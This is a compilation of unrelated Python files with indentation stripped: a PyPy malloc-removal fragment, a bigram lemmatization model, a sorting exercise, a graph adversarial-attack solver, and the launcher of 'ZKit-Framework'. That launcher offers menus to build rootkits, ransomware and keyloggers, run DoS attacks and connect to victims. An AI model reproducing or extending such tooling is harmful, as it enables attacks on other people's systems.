self.v_expand_malloc = op_to_remove.result
return self.handle_inlined_call(myframe, graph, newnodes)
argnodes = copynodes(newnodes, flagreadonly=myframe.find_vt_nodes())
kind, newgraph = mallocv.get_specialized_graph(graph, argnodes)
if kind == 'trivial':
return self.handle_default(op)
elif kind == 'inline':
return self.handle_inlined_call(myframe, graph, newnodes)
elif kind == 'call':
return self.handle_residual_call(op, newgraph, newnodes)
elif kind == 'fail':
raise CannotVirtualize(op)
else:
raise ValueError(kind)
def get_updated_frame(self, op):
sourceblock = self.virtualframe.sourceblock
nextopindex = self.virtualframe.nextopindex
self.nodes[op.result] = FutureReturnValue(op)
myframe = VirtualFrame(sourceblock, nextopindex, self.nodes,
self.virtualframe.callerframe,
self.virtualframe.calledgraphs)
del self.nodes[op.result]
return myframe
def handle_residual_call(self, op, newgraph, newnodes):
fspecptr = getfunctionptr(newgraph)
newargs = [Constant(fspecptr,
concretetype=lltype.typeOf(fspecptr))]
newargs += self.expand_nodes(newnodes)
newresult = self.make_rt_result(op.result)
newop = SpaceOperation('direct_call', newargs, newresult)
return [newop]
def handle_inlined_call(self, myframe, graph, newnodes):
assert len(graph.getargs()) == len(newnodes)
targetnodes = dict(zip(graph.getargs(), newnodes))
calledgraphs = myframe.calledgraphs.copy()
if graph in calledgraphs:
raise CannotVirtualize("recursion during inlining")
calledgraphs[graph] = True
calleeframe = VirtualFrame(graph.startblock, 0,
targetnodes, myframe, calledgraphs)
self.virtualframe = calleeframe
self.nodes = calleeframe.get_nodes_in_use()
return []
def handle_op_indirect_call(self, op):
v_func = self.rename_nonvirtual(op.args[0], op)
if isinstance(v_func, Constant):
op = SpaceOperation('direct_call', [v_func] + op.args[1:-1],
op.result)
return self.handle_op_direct_call(op)
else:
return self.handle_default(op)
class FutureReturnValue(object):
def __init__(self, op):
self.op = op # for debugging
def getfrozenkey(self, memo):
return None
def accumulate_nodes(self, rtnodes, vtnodes):
pass
def copy(self, memo, flagreadonly):
return self
# ____________________________________________________________
# helpers
def vars_alive_through_op(block, index):
# NB. make sure this always returns the variables in the same order
if len(block.exits) == 0:
return block.inputargs # return or except block
result = []
seen = {}
def see(v):
if isinstance(v, Variable) and v not in seen:
result.append(v)
seen[v] = True
# don't include the variables produced by the current or future operations
for op in block.operations[index:]:
seen[op.result] = True
# don't include the extra vars produced by exception-catching links
for link in block.exits:
for v in link.getextravars():
seen[v] = True
# but include the variables consumed by the current or any future operation
for op in block.operations[index:]:
for v in op.args:
see(v)
see(block.exitswitch)
for link in block.exits:
for v in link.args:
see(v)
return result
def is_return(block):
return len(block.exits) == 0 and len(block.inputargs) == 1
def is_except(block):
return len(block.exits) == 0 and len(block.inputargs) == 2
class CannotConstFold(Exception):
pass
def try_fold_operation(opname, args_v, RESTYPE):
args = []
for c in args_v:
if not isinstance(c, Constant):
return
args.append(c.value)
try:
op = getattr(llop, opname)
except AttributeError:
return
if not op.is_pure(args_v):
return
try:
result = op(RESTYPE, *args)
except TypeError:
pass
except (KeyboardInterrupt, SystemExit):
raise
except Exception, e:
pass
#log.WARNING('constant-folding %s%r:' % (opname, args_v))
#log.WARNING(' %s: %s' % (e.__class__.__name__, e))
else:
return (result,)
def getconstnode(v, renamings):
rtnode = RuntimeSpecNode(None, v.concretetype)
renamings[rtnode] = v
return rtnode
def graph_called_by(op):
assert op.opname == 'direct_call'
fobj = op.args[0].value._obj
graph = getattr(fobj, 'graph', None)
return graph
| nilq/baby-python | python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# # # #
# model-bi-gramms.py
# @author Zhibin.LU
# @created Fri Feb 23 2018 17:14:32 GMT-0500 (EST)
# @last-modified Wed Mar 14 2018 19:11:45 GMT-0400 (EDT)
# @website: https://louis-udm.github.io
# # # #
import gzip
import time
from collections import Counter
import regex as re
import spacy
import textacy
import loader
def load_data(folder):
"""
Load text in a string.
"""
file_paths = loader.list_files(folder)
input_words = []
target_words = []
for file_path in file_paths:
with gzip.open(file_path, 'rt', encoding='ISO-8859-1') as f:
lines = f.read().split('\n')
for line in lines:
if line.startswith('#begin') or line.startswith('#end'):
continue
line = line.encode("ascii", errors="ignore").decode()
split_result = line.split('\t')
if len(split_result) == 2:
target_word, input_word = split_result
input_word = input_word.lower().strip()
target_word = target_word.lower().strip()
pattern = re.compile(r'\'')
input_word = re.sub(pattern, '', input_word)
target_word = re.sub(pattern, '', target_word)
input_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", input_word)
target_word = re.sub("([\?\!\~\&\=\[\]\{\}\<\>\(\)\_\-\+\/\.])", r" \1 ", target_word)
pattern = re.compile(r'\d+s')
m1 = re.search(pattern, input_word)
m2 = re.search(pattern, target_word)
if m2 is not None and m1 is None:
input_word = re.sub('(\d+)', r"\1s", input_word)
input_word = re.sub('(\d+)', r" \1 ", input_word)
target_word = re.sub('(\d+)', r" \1 ", target_word)
input_word = re.sub(' +', ' ', input_word)
target_word = re.sub(' +', ' ', target_word)
if input_word == '':
continue
input_words.append(input_word)
target_words.append(target_word)
return ' '.join(input_words), ' '.join(target_words)
print("{} Loading data...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
train_lemm_corpus, train_surf_corpus = load_data('data/train')
test_lemm_corpus, test_surf_corpus = load_data('data/test')
train_lemm_corpus = re.sub(' +', ' ', train_lemm_corpus)
train_surf_corpus = re.sub(' +', ' ', train_surf_corpus)
test_lemm_corpus = re.sub(' +', ' ', test_lemm_corpus)
test_surf_corpus = re.sub(' +', ' ', test_surf_corpus)
# %%
'''
Get 2-gramms model, all types, all sentences of train_lemme set.
Get 2-gramms model, all types, all sentences of train_surface set.
Get all types, all sentences of test_lemme set.
Get all types, all sentences of test_surface set.
'''
print("{} Training model...".format(time.strftime("%d-%m-%Y %H:%M:%S")))
start_time = time.time()
nlp = spacy.load('en', disable=['parser', 'tagger'])
train_lemm_tacy_doc = nlp(train_lemm_corpus)
train_surf_tacy_doc = nlp(train_surf_corpus)
test_lemm_tacy_doc = nlp(test_lemm_corpus)
test_surf_tacy_doc = nlp(test_surf_corpus)
print('Tokens of train_lemm_tacy_doc: ', len(train_lemm_tacy_doc))
print('Tokens of train_surf_tacy_doc: ', len(train_surf_tacy_doc))
if len(train_lemm_tacy_doc) != len(train_surf_tacy_doc):
print('Warning: the numbre of tokens of lemme and surfaceis in train not equal !!!!!!')
print('Tokens of test_lemm_tacy_doc: ', len(test_lemm_tacy_doc))
print('Tokens of test_surf_tacy_doc: ', len(test_surf_tacy_doc))
if len(test_lemm_tacy_doc) != len(test_surf_tacy_doc):
print('Warning: the numbre of tokens of lemme and surfaceis on test not equal !!!!!!')
# %%
train_surf_tacy_sents = []
start_ind = 0
for token in train_surf_tacy_doc:
if token.text in ['.', '?', '!']:
train_surf_tacy_sents.append(train_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train surf:', len(train_surf_tacy_sents))
train_lemm_tacy_sents = []
start_ind = 0
for token in train_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
train_lemm_tacy_sents.append(train_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of train lemm:', len(train_lemm_tacy_sents))
if len(train_surf_tacy_sents) != len(train_lemm_tacy_sents):
print('Warning: the numbre of sentances of lemme and surface is not equal !!!!!!')
test_surf_tacy_sents = []
start_ind = 0
for token in test_surf_tacy_doc:
if token.text in ['.', '?', '!']:
test_surf_tacy_sents.append(test_surf_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test surf:', len(test_surf_tacy_sents))
test_lemm_tacy_sents = []
start_ind = 0
for token in test_lemm_tacy_doc:
if token.text in ['.', '?', '!']:
test_lemm_tacy_sents.append(test_lemm_tacy_doc[start_ind:token.i + 1])
start_ind = token.i + 1
print('total sentence of test lemm:', len(test_lemm_tacy_sents))
if len(test_surf_tacy_sents) != len(test_lemm_tacy_sents):
print('Warning: the numbre of sentances of lemme and surface on test is not equal !!!!!!')
# %%
train_lemm_tacy_doc = textacy.Doc(train_lemm_tacy_doc)
train_surf_tacy_doc = textacy.Doc(train_surf_tacy_doc)
train_lemm_2grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 2grams bag:', len(train_lemm_2grams_bag))
train_lemm_1grams_bag = train_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train lemm 1grams bag:', len(train_lemm_1grams_bag))
train_surf_2grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=2, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 2grams bag:', len(train_surf_2grams_bag))
train_surf_1grams_bag = train_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False,
drop_determiners=False)
print('size of train surf 1grams bag:', len(train_surf_1grams_bag))
test_lemm_tacy_doc = textacy.Doc(test_lemm_tacy_doc)
test_surf_tacy_doc = textacy.Doc(test_surf_tacy_doc)
test_lemm_1grams_bag = test_lemm_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test lemm 1grams bag:', len(test_lemm_1grams_bag))
test_surf_1grams_bag = test_surf_tacy_doc.to_bag_of_terms(ngrams=1, normalize='lower', named_entities=False,
weighting='count', as_strings=True, filter_stops=False,
filter_punct=False, filter_nums=False, drop_determiners=False)
print('size of test surf 1grams bag:', len(test_surf_1grams_bag))
# %%
# test code
print(type(train_lemm_2grams_bag), len(train_lemm_2grams_bag))
print(type(train_lemm_1grams_bag), len(train_lemm_2grams_bag))
print('him . ', train_lemm_2grams_bag['him .'])
print('. the', train_lemm_2grams_bag['. the'])
i = 0
for sent in train_lemm_tacy_sents:
print(sent.text)
i += 1
if i > 10: break
# test code
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_surf_tacy_doc.tokens)):
# # if chs[0].text=='have' and chs[1].text=="'":
# # print(i,chs[0],chs[1])
# # break
# if chs[0].text not in ['be','find','get','have','a','he','lie','use','leave','go','see','she','we','i','would'] and chs[0].text[0]!=chs[1].text[0]:
# print(i,chs[0],chs[1])
# break
# # if i>=740 and i<=750:
# # print(i,chs[0],chs[1])
#
# # print(train_lemm_corpus[0:200])
# for i,chs in enumerate(zip(train_lemm_tacy_doc.tokens,train_lemm_corpus.split(' '))):
# if chs[0].text!=chs[1]:
# print(i,'|'+chs[0].text+'|','|'+chs[1]+'|')
# # break
# if i>345:
# break
# %%
'''
Get all pair of surf-lemma and their count on train data set.
'''
pairs_list = []
for lemma, surf in zip(train_lemm_tacy_doc, train_surf_tacy_doc):
pairs_list.append(surf.text.strip() + ' ' + lemma.text.strip())
train_surf_lemm_map = {}
for i, pair in enumerate(pairs_list):
if pair not in train_surf_lemm_map:
train_surf_lemm_map[pair] = pairs_list.count(pair)
# test code
print('are be ', train_surf_lemm_map['are be'])
# print('( ( ',train_surf_lemm_map['( ('])
# print('. . ',train_surf_lemm_map['. .'])
# %%
# test code
# print('(rimatara reed) ',train_lemm_2grams_bag['rimatara reed'])
print('(you be) ', train_lemm_2grams_bag['you be'])
print('(he go) ', train_lemm_2grams_bag['he go'])
print('p(be|you)=', train_lemm_2grams_bag['you be'] / train_lemm_1grams_bag['you'])
print('p(cat|a)=', train_lemm_2grams_bag['a cat'] / train_lemm_1grams_bag['a'])
print('p(am|i)=', train_surf_2grams_bag['i am'] / train_surf_1grams_bag['i'])
print('p(be-o|are-s)=', train_surf_lemm_map['are be'] / train_surf_1grams_bag['are'])
print('p(.-o|.-s)=', train_surf_lemm_map['. .'] / train_surf_1grams_bag['.'])
# print('p(the|bos)=',train_surf_2grams_bag['. the'])
# %%
'''
Functions of Evalutate the prediction
'''
def count_accuracy_raw(pred_corpus, target_corpus):
"""
Test accuracy, Raw accuracy
"""
count_accu = 0
total = 0
pred_sents = pred_corpus.split('.')
target_sents = target_corpus.split('.')
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = pred_sent.split(' ')
targ_list = target_sent.split(' ')
for pred_token, target_token in zip(pred_list, targ_list):
total += 1
if pred_token == target_token:
count_accu += 1
return count_accu, total
raw_acc_count, raw_count_total = count_accuracy_raw(train_lemm_corpus, train_surf_corpus)
print('test of Accuracy raw:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
def count_accuracy_spacy_raw(pred_sents, target_sents):
"""
Test accuracy, accuracy of spacy's token
"""
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
total += 1
for pred_token, target_token in zip(pred_sent, target_sent):
total += 1
if pred_token.text == target_token.text:
count_accu += 1
return count_accu, total
spacy_acc_count, spacy_count_total = count_accuracy_spacy_raw(train_lemm_tacy_sents, train_surf_tacy_sents)
print('test of Accuracy spacy:', spacy_acc_count, '/', spacy_count_total, '=', spacy_acc_count / spacy_count_total)
# this function is for when we want stop it before all sentences.
# if not, utilse metric.accuracy instead
def count_accuracy(pred_sents, target_sents):
count_accu = 0
total = 0
for pred_sent, target_sent in zip(pred_sents, target_sents):
pred_list = re.split(r"-| |\?", pred_sent)
# pred_list=pred_sent.split(' ')
for pred_token, target_token in zip(pred_list, target_sent):
total += 1
if pred_token == target_token.text:
count_accu += 1
return count_accu, total
def decode_sents(vectors, type_list):
sents = []
for v in vectors:
sent = ' '.join(map(lambda x: type_list[x], v))
# print (sent)
sents.append(sent)
return sents
def decode_sent(vector, type_list):
return ' '.join(map(lambda x: type_list[x], vector))
# %%
'''
**** Model Bi-gramms predicteur ****
'''
'''
Get all [lemm(t-1),lemm(t)] -> surf(t)
and get map of bi-gramms [lemm(t-1),lemm(t)] -> surf word ,
in which the surface word is max count of the same pair of [lemm(t-1),lemm(t)].
for example: if there have {[you be]->are} 3 times, and {[you be]->is} 1 times,
then map([you be])=are.
'''
bigramms_lemm_surf_map = {}
bigramms_lemm_surf_count_map = {}
for lemm_sent, surf_sent in zip(train_lemm_tacy_sents, train_surf_tacy_sents):
for i, token in enumerate(zip(lemm_sent, surf_sent)):
if i == 0:
if token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[token[0].text] = [token[1].text]
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_count_map:
l1 = bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text]
l1.append(token[1].text)
else:
bigramms_lemm_surf_count_map[lemm_pre + ' ' + token[0].text] = [token[1].text]
lemm_pre = token[0].text
for k, v in bigramms_lemm_surf_count_map.items():
word_counts = Counter(v)
bigramms_lemm_surf_map[k] = word_counts.most_common(1)[0][0]
print('size of bi-grammes: ', len(bigramms_lemm_surf_map))
# test code
print('you be -> ', bigramms_lemm_surf_map['you be'])
# %%
'''
Model Bi-gramms predicteur predict on test data
'''
print('--Model Bi-gramms predicteur predict on test data:---')
bigramms_pred_sents = []
count_accu = 0
for k, sent in enumerate(zip(test_lemm_tacy_sents, test_surf_tacy_sents)):
pred_sent = []
for i, token in enumerate(zip(sent[0], sent[1])):
if i == 0:
if token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
# if can't find the pair of this lemm word,use directly this lemm word
pred_sent.append(token[0].text)
# if this not paired lemm word ==the surface word correspondant.
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
else:
if lemm_pre + ' ' + token[0].text in bigramms_lemm_surf_map:
pred_token = bigramms_lemm_surf_map[lemm_pre + ' ' + token[0].text]
if pred_token == token[1].text:
count_accu += 1
pred_sent.append(pred_token)
else:
# if can't find the pair of this lemm word,use directly this lemm word
pred_sent.append(token[0].text)
# if this not paired lemm word ==the surface word correspondant.
if token[0].text == token[1].text:
count_accu += 1
lemm_pre = token[0].text
pred_sent_text = ' '.join(pred_sent)
# pred_sent_text=pred_sent_text.rstrip()
bigramms_pred_sents.append(pred_sent_text)
if k <= 30:
print('-- NO.', k)
print(test_lemm_tacy_sents[k].text)
print(test_surf_tacy_sents[k].text)
print(pred_sent_text)
# %%
'''
Calcule accuracy of Bi-gramme model:
'''
raw_acc_count, raw_count_total = count_accuracy_raw(test_lemm_corpus, test_surf_corpus)
print('Accuracy raw on test data:', raw_acc_count, '/', raw_count_total, '=', raw_acc_count / raw_count_total)
test_surf_tacy_sents_raw = [sent.text for sent in test_surf_tacy_sents]
from metric import *
taux_accu = accuracy(test_surf_tacy_sents_raw, bigramms_pred_sents)
print('Accuracy of bi-gramms predicteur on test data:', count_accu, '/', len(test_surf_tacy_doc), '=', taux_accu)
end_time = time.time()
print('The Bi-grammes took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
'''
# Part-of-speech tagging
'''
# alternative for parse:nlp = spacy.load('en', disable=['parser', 'tagger']),tagger = Tagger(nlp.vocab)
nlp2 = spacy.load('en')
start_time = time.time()
parse_pred_sents = []
for i, sent in enumerate(bigramms_pred_sents):
parsed_sent = nlp2(sent)
parse_pred_sent = []
rule1 = False
rule2 = False
rule3 = False
rule4 = False
rule42 = False
rule43 = False
for j, token in enumerate(parsed_sent):
if token.dep_ == 'nsubj' and token.tag_ == 'NN': # noun, singular or mass
rule1 = True
if token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl':
rule2 = True
# this rule is not so good:
# if token.pos_=='NUM':
# rule3=True
if token.dep_ == 'pobj' and token.tag_ == 'CD' and len(token.text) == 4: # 1990
rule4 = True
if rule4 and token.dep_ == 'nsubj' and token.tag_ == 'NN':
rule42 = True
rule4 = False
if rule4 and (token.dep_ == 'nsubj' and token.tag_ == 'NNS' or token.dep_ == 'expl'):
rule43 = True
rule4 = False
if rule1 and token.pos_ == 'VERB':
rule1 = False
if token.text == 'be':
parse_pred_sent.append('is')
continue
if token.text == 'have':
parse_pred_sent.append('has')
continue
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule2 and token.pos_ == 'VERB':
rule2 = False
if token.text == 'be':
parse_pred_sent.append('are')
continue
if token.text == 'has':
parse_pred_sent.append('have')
continue
if rule3 and token.tag_ == 'NN':
rule3 = False
if token.text == token.lemma_:
parse_pred_sent.append(token.text + 's')
continue
if rule42 and token.pos_ == 'VERB':
rule42 = False
if token.text in ['be', 'is']:
parse_pred_sent.append('was')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
if rule43 and token.pos_ == 'VERB':
rule43 = False
if token.text in ['be', 'are']:
parse_pred_sent.append('were')
continue
# this rule is not so good:
# if token.text==token.lemma_ and token.text.endswith('e'):
# parse_pred_sent.append(token.text+'d')
# # print(' '.join(parse_pred_sent))
# continue
parse_pred_sent.append(token.text)
parse_pred_sents.append(' '.join(parse_pred_sent))
taux_accu = accuracy(test_surf_tacy_sents_raw, parse_pred_sents)
print('Accuracy of Parse predicteur on test data:', taux_accu)
end_time = time.time()
print('The Parse took a total of %.3f minutes to do training and prediction.' % ((end_time - start_time) / 60))
# %%
# test code
# parse_pred_sent=[]
# parsed_sent=nlp2(bigramms_pred_sents[2371]) #772,123,2371
# rule1=False
# for j,token in enumerate( parsed_sent):
# print(token.text, token.pos_, token.tag_, token.dep_)
# if token.dep_=='nsubj' and token.tag_=='NN':
# rule1=True
# if rule1 and token.pos_=='VERB':
# rule1=False
# if token.text=='be':
# parse_pred_sent.append('is')
# continue
# if token.text=='have':
# parse_pred_sent.append('has')
# continue
# if token.text==token.lemma_:
# parse_pred_sent.append(token.text+'s')
# continue
# parse_pred_sent.append(token.text)
# print(' '.join(parse_pred_sent))
| nilq/baby-python | python |
"ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework"
# Copyright (c) 2020, Zer0 . All rights reserved.
# This Work Is Licensed Under Apache Software License 2.0 More
# Can Be Found In The LICENSE File.
__author__ = "Zer0"
__version__ = "1.4.5"
__license__ = "Apache Software License 2.0"
__status__ = "Production"
import os
from datetime import datetime as dt
import sys
def start():
"Starts zkit with those beautiful menues"
try:
try:
# Doing some imports
from core.helper_core import notify, Color, Generate, dos, \
ctrler, helpbanner, init, print_banner, list_builtin_payloads, search_for_payloads, crash_handler
except (ImportError, ModuleNotFoundError) as value:
# Ops ! Sth is missing
print(
"One Or Some On Requirments Not Found . Please Install Them And Try Again ."
+ "Python Threw : "
+ str(value)
)
raise
# Printing A Banner More Coming Soon
_, red, green, yellow, blue, magenta, cyan, _, reset = Color().GetAllColors()
init()
print_banner()
# Hard And Boring Code
print(
"\t " * 5 + "Hacking is" + red + " C " + green + "O " + blue + "L " +
yellow + "O " + magenta + "R " + green +
"F " + red + "U " + magenta + "L " + reset
)
print(
"Available Options Are or Enter '?' To get a summery about notes of using this framework:\n"
+ red + " {1} --> Create A RootKit\n"
+ green + " {2} --> Create A Ransomware (Beta)\n"
+ blue + " {3} --> Create A KeyLogger \n"
+ yellow + " {4} --> Run A Dos Attack\n"
+ magenta + " {5} --> Connect To A Victim\n"
+ red + " {6} --> Generate Your User Payloads\n"
+ cyan + " {000}" + "--> Exit ZKit-Framework\n" + reset
)
while True:
try:
choice = str(input("..> "))
if choice == "000":
break
if choice == "?":
print(helpbanner)
elif choice == "1":
payloads = list_builtin_payloads('rootkit')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "2":
print(
"This Feature (Ransomware) is beta and have not tested . continue anyway ? (Y/N) : ", end="")
agreed = True if str(
input("")).lower().strip() == "y" else False
if agreed:
payloads = list_builtin_payloads('ransomware')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
else:
print("Ignoring . Back To Main Menu.")
elif choice == "3":
payloads = list_builtin_payloads('keylogger')
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice == "4":
dos.main()
elif choice == "5":
ctrler.Main()
elif choice == "6":
payloads = list_payloads()
if len(payloads) == 0:
print(
"No User Payload Was Found . Please Download one from zkit-market or make one using zkit-payload-template")
else:
print("Please Choose One Of Them (Number Of It): ", end="")
index = input("")
Generate(list(payloads.values())[int(index) - 1])
elif choice is not None:
notify(
"problem", "Invalid Input {" + "{}".format(choice) + "}")
except (KeyboardInterrupt, EOFError):
print("\nPlease Type '000' To Exit ZKit-Framework\n")
choice = None
except BaseException as e:
crash_handler(e)
start()
| nilq/baby-python | python |
# Implement Bubble Sort
import time
# we have a data set starting with the very basic happy path to complex
data = {
"data1" : [5,4,1,3,2], # happy path easy to vizualize
"data2" : [5,4,1999,3,2,8,7,6,10,100], #larger range of values
"data3" : [5,4,1,3,2,2], # repeated values
"data4" : [1,1,1,1,1,1], # every element is the same
"data5" : [0,22,100,1,2,3,4,5,6,7,7,8,89,9,0,-1], #negative + zero
"data6" : [5,4,3,2,1], #reverse sorted array
"data7" : [1], # data with only 1 value
"data8" : [], # data with NULL value
"data9" : [4,2,1,6,2,10,4,3,10,6,5,6,7,2,10,10,4,6,5,8],
}
#-----------------------------------------------------------------------------#
# INSERTION SORTING
#-----------------------------------------------------------------------------#
def top_k(arr, k):
result = []
# for left_ptr in range(len(arr)-1):
# # result_dict[arr[left_ptr]] = 1
# curr_ptr = left_ptr + 1
# # go backwards in the array
# for curr_ptr in range(curr_ptr,0,-1):
# # if arr[curr_ptr] > arr[curr_ptr - 1] and arr[curr_ptr] not in arr[:curr_ptr]:
# if arr[curr_ptr] > arr[curr_ptr - 1]:
# arr[curr_ptr], arr[curr_ptr - 1] = arr[curr_ptr - 1], arr[curr_ptr]
arr.sort(reverse = True)
ptr = 0
while len(result) < k and ptr < len(arr):
if(ptr == 0 or arr[ptr] != arr[ptr-1]):
result.append(arr[ptr])
ptr += 1
return result
if __name__ == "__main__":
# Call the dataset to test Insertion sort
k = 4
for i in range(len(data)):
start_time = time.time()
print(top_k(data["data"+str(i+1)],k))
print("Insertion time for data" + str(i+1) + " = "+ str(time.time() - start_time)) | nilq/baby-python | python |
import numpy as np
import time
from numba import njit, prange
def exact_solver_wrapper(A_org, Q, p, L, delta_l, delta_g, constr='1'):
"""
Exact attacks for A^1, A^2 or A^{1+2}
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets. If it is a scalar, expand to list with same value
delta_g: global budgets
constr: '1' (local budget solver) or '1+2' (local+global budget solver) or '2'
return:
unpert_val: function value under A_org (if constr='1', this is a vector)
opt_val: function value under A_pert (if constr='1', this is a vector)
A_pert: optimal attacking adjacency matrix
"""
if constr == '1':
# Exact attacks for A^1
return local_budget_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '1+2':
# Exact attacks for A^{1+2}
return dp_solver(A_org, Q, p, L, delta_l, delta_g)
elif constr == '2':
# Exact attacks for A^2
raise NotImplementedError('Exact attacks for A^2 is not implemented!')
@njit("(float64[:, :], float64[:, :], float64[:], float64[:, :], int64)", parallel=False, fastmath=True, cache=True)
# # @njit(parallel=True, fastmath=True)
# # @njit
def local_budget_precompute(A_org, Q, p, L, delta_l):
"""
solver of equation 8&11 of the paper when activation is identity, max_margin loss and average pooling
"""
nG = A_org.shape[0]
a = np.zeros((nG+1, delta_l+1)) # matrix a for described in equation 6
add_edge_matrix = np.zeros((nG+1, delta_l+1))
for i in range(1, nG+1): # looping each row of A
A_i = A_org[i-1,:]
A_i_edges = int(np.sum(A_i))
Q_i = Q[i-1]
L_i = L[i-1]
max_edges = min(A_i_edges + delta_l + 1, nG)
min_edges = max(A_i_edges - delta_l + 1, 1)
possible_denomi = max_edges - min_edges + 1
chunk_edges_mtx, chunk_no_edges_mtx = np.zeros((possible_denomi,delta_l+1)), np.zeros((possible_denomi,delta_l+1))
for x in range(min_edges, max_edges+1): # looping all possible (1'A_i + 1)
V_L = Q_i + L_i*x
indices = np.argsort(V_L)
chunk_edges, chunk_no_edges = [0.0]*(delta_l+1), [0.0]*(delta_l+1)
temp_idx = 1
for y in indices:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
chunk_no_edges[temp_idx] = V_L[y] + chunk_no_edges[temp_idx-1]
temp_idx += 1
temp_idx = 1
for y in indices[::-1]:
if temp_idx > delta_l: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
chunk_edges[temp_idx] = V_L[y] + chunk_edges[temp_idx-1]
temp_idx += 1
chunk_edges_mtx[x - min_edges] = chunk_edges
chunk_no_edges_mtx[x - min_edges] = chunk_no_edges
A_V_i = np.dot(A_i, Q_i) + Q_i[i-1] + p[i-1]
A_L_i = np.dot(A_i, L_i)
a[i,0] = A_V_i/(A_i_edges+1) + A_L_i
for j in range(1,delta_l+1): # looping each possible local constraint
min_f = np.inf
for k in range(j+1): # looping different combinations of adding/removing
add_edges, remove_edges = k, j-k
if A_i_edges+add_edges > nG-1 or A_i_edges-remove_edges < 0:
continue
new_edges = A_i_edges+add_edges-remove_edges + 1
f = A_V_i + A_L_i*new_edges
# adding k edges from chunk of A_i=0 in ascent order
if add_edges > 0:
# print(chunk_no_edges_mtx[new_edges][add_edges])
f += chunk_no_edges_mtx[new_edges - min_edges][add_edges]
# removing j-k edges from chunk of A_i=1 in descent order
if remove_edges > 0:
# print(chunk_edges_mtx[new_edges][remove_edges])
f -= chunk_edges_mtx[new_edges - min_edges][remove_edges]
final_f = f/new_edges
if final_f < min_f:
min_f = final_f
sol = (min_f, add_edges)
a[i,j], add_edge_matrix[i,j] = sol
return a, add_edge_matrix
@njit("(float64[:], float64[:], float64[:], int64, int64, int64)", cache=True)
def get_A_opt(Q_i, A_i, L_i, i, j, add_edges):
A_i_edges = np.sum(A_i)
remove_edges = j - add_edges
new_edges = A_i_edges+add_edges-remove_edges + 1
V_L = Q_i + L_i.T*new_edges
indices = np.argsort(V_L)
A_new_i = A_i.copy()
added_edges = 0
for y in indices:
if added_edges == add_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 0:
A_new_i[y] = 1
added_edges += 1
removed_edges = 0
for y in indices[::-1]:
if removed_edges == remove_edges: break
if y == i-1: continue # excluding self edge
if A_i[y] == 1:
A_new_i[y] = 0
removed_edges += 1
return A_new_i
@njit("(float64[:,:], float64[:,:], float64[:], float64[:,:], int64[:], int64)", cache=True)
def dp_solver(A_org, Q, p, L, delta_l, delta_g):
"""
DP for solving min_{A_G^{1+2}} \sum_i [(A_i+e_i)@Q_i + p_i]/(1'A_i + 1) + A_i@L_i]
Algorithm 1:
1. Precomputing matrix a
2. DP to get matrix s
3. Tracing back
Complexity: nG^2*delta_l*log(nG) + nG*delta_l^2 + nG^2*delta_l^2
param:
A_org: original adjacency matrix
Q: matrix, Q_i = Q[i]
p: vector
L: matrix, L_i = L[i]
delta_l: row budgets
delta_g: global budgets
"""
# start = time.time()
max_delta_l = max(delta_l)
a, add_edge_matrix = local_budget_precompute(A_org, Q, p, L, max_delta_l)
# print(f'Precomputation of matrix a: {time.time() - start}')
# ---------------------FIRST LOOP---------------------
nG = A_org.shape[0]
c = [0]*(nG+1)
for t in range(1, nG+1):
c[t] = min(c[t-1]+delta_l[t-1], delta_g)
s = [np.array([0.0]*(i+1)) for i in c]
# s = np.zeros((nG+1, min(nG*np.max(delta_l), delta_g)+1))
